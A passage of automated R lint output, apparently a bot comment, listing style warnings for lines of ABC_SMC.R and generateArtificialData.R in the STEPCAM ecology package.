compVals, weights)\n                            ^~~~~~~~\n```\n[R/ABC_SMC.R:228:13:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L228) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:228:14:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L228) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:228:34:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L228) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:234:21:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L234) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:234:22:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L234) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:236:13:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L236) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:236:38:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L236) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:247:5:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:247:17:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:248:5:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:248:17:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:249:5:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:249:17:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:250:16:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L250) *style:* **Variable and function names should be all lowercase.**\n```r\n​    weights <- nextWeights\n               ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:21:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                    ^~~~~~~~\n```\n[R/ABC_SMC.R:252:31:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                              ^~~~~~~~\n```\n[R/ABC_SMC.R:252:41:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                        ^~~~~~~~\n```\n[R/ABC_SMC.R:252:51:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                                  ^~~~~~~\n```\n[R/ABC_SMC.R:253:21:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                    ^~~~~~\n```\n[R/ABC_SMC.R:253:29:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                            ^~~~~~\n```\n[R/ABC_SMC.R:253:37:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                                    ^~~~~~\n```\n[R/ABC_SMC.R:254:54:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L254) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:257:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L257) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:257:19:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                  ^~~~~~~~\n```\n[R/ABC_SMC.R:257:35:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:257:51:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:258:9:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:258:32:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L258) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:258:37:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                                    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:5:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n    ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:26:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L261) *style:* **Commas should always have a space after.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^\n```\n[R/ABC_SMC.R:261:26:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:5:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:262:19:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:263:5:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:263:19:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:5:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:264:19:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:271:61:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L271) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:275:63:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L275) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                             ~^~\n```\n[R/ABC_SMC.R:278:15:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L278) *style:* **Put spaces around all infix operators.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n             ~^~~\n```\n[R/ABC_SMC.R:279:44:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L279) *style:* **Put spaces around all infix operators.**\n```r\n​\t                          collapse = NULL), header = F)\n                                          ~^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * 